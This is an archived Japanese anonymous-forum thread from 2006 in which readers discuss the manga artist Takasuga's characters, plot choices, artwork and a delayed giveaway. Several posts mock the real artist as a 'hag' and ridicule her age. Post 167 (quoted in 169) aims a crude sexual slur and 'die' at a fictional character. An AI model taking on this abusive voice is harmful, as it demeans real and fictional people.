136 :花と名無しさん:2006/10/10(火) 13:30:55 ID:???0
ラーメン屋のメニューのチャーシューメンのメンがカタカナだったり漢字だったりしてるな。
あと壁に貼ってあるメニューにはラーメン350円ってなってるがあれはなんだ?


137 :花と名無しさん:2006/10/10(火) 17:24:32 ID:???O
高須賀婆の妄想

138 :花と名無しさん:2006/10/10(火) 20:08:36 ID:???0
>>136
「重箱の隅をつつく」って言葉知ってる?

139 :花と名無しさん:2006/10/11(水) 22:21:15 ID:???0
知らない

140 :花と名無しさん:2006/10/12(木) 01:30:20 ID:fqr52oDxO
その前にちっとも重箱のスミじゃない件

141 :花と名無しさん:2006/10/12(木) 12:06:45 ID:???0
好きなものが「w-inds」に「V6」???
30過ぎのおばはんが???プゲラ

頑張れおばちゃん!!

142 :花と名無しさん:2006/10/12(木) 15:06:33 ID:???0
個人の好みなんだからほっといてあげなよ・・・
最近執拗に叩いてる人は同一人物?

143 :花と名無しさん:2006/10/12(木) 17:16:40 ID:???O
婆のファンって芋焼酎ばっかじゃん

144 :花と名無しさん:2006/10/12(木) 18:28:06 ID:???O
なんだか空気悪くなっちゃったね。
マターリいきましょうよ。

145 :花と名無しさん:2006/10/12(木) 20:54:50 ID:???O
仕切るなボケ

146 :花と名無しさん:2006/10/13(金) 02:41:25 ID:???O
イラストプレゼントの当選者発表マダー?

147 :花と名無しさん:2006/10/13(金) 12:01:36 ID:???O
>>145落ち着け。

148 :花と名無しさん:2006/10/13(金) 12:19:49 ID:???O
だから仕切るなって

149 :花と名無しさん:2006/10/13(金) 15:09:32 ID:???O
キスの方は次回のクッキーBOXにも掲載されるのでしょうか?

150 :花と名無しさん:2006/10/13(金) 16:18:28 ID:???0
【穴毛場ー蛾ー】

検索用。

151 :花と名無しさん:2006/10/14(土) 01:51:35 ID:???0
キスには百合リンも出てくる?

152 :花と名無しさん:2006/10/14(土) 09:14:01 ID:???0
>>151
まだでてこないー
24・5になったゆりりんが見たいなー

そういえばゆりりんってすっごい大人びてるよね。
初登場の時から20そこそこには見えなかった。
結婚も早いし。

153 :花と名無しさん:2006/10/14(土) 09:45:37 ID:???0
>>126=133
指摘にほぼ同意。

特に仙崎弟なんてあれほど自分が好きな女をもて遊んでる男が許せなかったくせに、
その相手が上原じゃなかったらどうでもいいのか?
ゆりりんがまだ出てこないのは出産ネタを温存してるからだと思いたいが
(そして菜緒がまた結婚に憧れるw)、どうせ兄貴は出てこないんだろうな。
あと、あれだけ菜緒の田舎や父親ネタが出てきたのに、母親が一切出てこないのも謎だし。
単に同じ顔の老けたバージョンが描けないだけ?

154 :133:2006/10/15(日) 02:20:20 ID:???0
でもよく考えたら上原と兄が月とスッポンっていうのはあくまでゆりりんの
主観だから別に上原よりかっこよくなくてもいいのにな。

上原って口が⌒ってなっててあんま好きじゃないなぁ。

155 :花と名無しさん:2006/10/15(日) 03:46:32 ID:???O
婆は子供・中年・年寄りの絵が下手すぎる。
特に中年のチビデフォなしの顔はやばい。
菜緒父が出てきたときキモッとのけぞった…(キャラが、とかじゃなくて絵がキモス)

コール不評につき打ち切りきぼん

156 :花と名無しさん:2006/10/15(日) 09:15:28 ID:???0
>>154
ゆりりんは男の趣味が唯一の欠点で、
上原と似てるのは本当に雰囲気だけで、
実は太ったオッサンとかいうオチも想像してた。
読者のイメージが崩れるから、さすがにそれはしないか。

>>155
不評なのは、菜緒と上原が恋人同士としては半同棲という行く所まで行ってしまい、
この二人の関係をメインにするともう結婚ネタしかなくてワンパターンでつまらないから?
前作でそれなりに立ってたキャラのその後をやるだけやって終了、でもいいかも。
菜緒には第三者的な視点でやってもらって。
>>133さんが指摘してた点は最低消化して欲しいけどなあ。

157 :花と名無しさん:2006/10/21(土) 15:43:33 ID:???O
ブログの猫かわゆす
高須賀優しいな、嫌いだけど
動物につられた

158 :花と名無しさん:2006/10/21(土) 18:08:50 ID:???0
アレか
「かっこいいけどイジワルでムカツク〜」な男子が捨て猫にエサやってんの見てキュ〜ン&Hearts;っつうアレか

159 :花と名無しさん:2006/10/22(日) 21:42:07 ID:???0
なんかもう隠居漫画家になっちゃったね

160 :花と名無しさん:2006/10/25(水) 07:11:04 ID:S9sJ76LU0
私が気になったのは、上原の両親が死んでいた設定だったと思うけど、
そうでなくてゆりが嫁に来て実家にいづらくなったから
一人暮らしした、とかでいいと思った。
あののほほん雰囲気には重過ぎる設定と思いました。


161 :花と名無しさん:2006/10/25(水) 18:19:15 ID:???0
>>160
でも親も同居でしかも学校も通える距離なら、
小舅とはいえまだ学生の上原が家を出るほど気を使う必要もなかったんじゃ?
わざと遠くの中学か高校に進学して寮か独り暮らしする設定ならアリかもしれないけど。

それに両親がいなくて兄がずっと親代わりだったからこそ、
それに反発する上原と、旦那と同じ気持ちで上原の面倒を本気で見たい
ゆりりんの対比も光るかと。

162 :花と名無しさん:2006/10/26(木) 01:42:05 ID:???0
>>160
だって‥‥まだ揺れる思いが存在した‥から。

163 :花と名無しさん:2006/11/13(月) 03:25:30 ID:???0
保守age

164 :花と名無しさん:2006/11/29(水) 03:53:51 ID:yIQetnI+0
http://hello98.blog83.fc2.com/blog-entry-34.html
http://hello98.blog83.fc2.com/blog-entry-35.html

ちょっとこれ見てくれ
何かお日様カンパニーっぽくないか?
実際にもこういう話あるんだね

165 :花と名無しさん:2006/12/03(日) 16:15:22 ID:???0
お日様カンパニーってどんな話やっけ?

166 :花と名無しさん:2006/12/03(日) 21:24:14 ID:???O
中学生の主人公が通ってる塾の前にある楽器店に毎日通っている男の子を、
主人公が、好きになる話じゃなかった?

懐かしい〜

167 :花と名無しさん:2006/12/08(金) 18:52:15 ID:???O
上原の肉便器・糞ビッチ菜緒しね

168 :花と名無しさん:2006/12/08(金) 23:02:34 ID:???O
お日様カンパニー好きだったな〜。

169 :花と名無しさん:2006/12/09(土) 05:27:15 ID:???O
167:花と名無しさん :2006/12/08(金) 18:52:15 ID:???O [sage]
上原の肉便器・糞ビッチ菜緒しね

↑上原ヲタきんもー☆

170 :花と名無しさん:2006/12/09(土) 10:02:40 ID:???O
某二次創作サイトでの上原ドS鬼畜っぷりワロス

171 :花と名無しさん:2006/12/10(日) 21:08:53 ID:vVmGgnkmO
だいぶ前にブログで募集してた原画プレゼントどうなったんだ
ABCとかあったやつ

もうだいぶ経つよ、4ヶ月以上。。適当な企画だな

172 :花と名無しさん:2006/12/29(金) 16:34:30 ID:???0
買ってワクワク、読んで後悔とはこの人の漫画によく当てはまる。

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)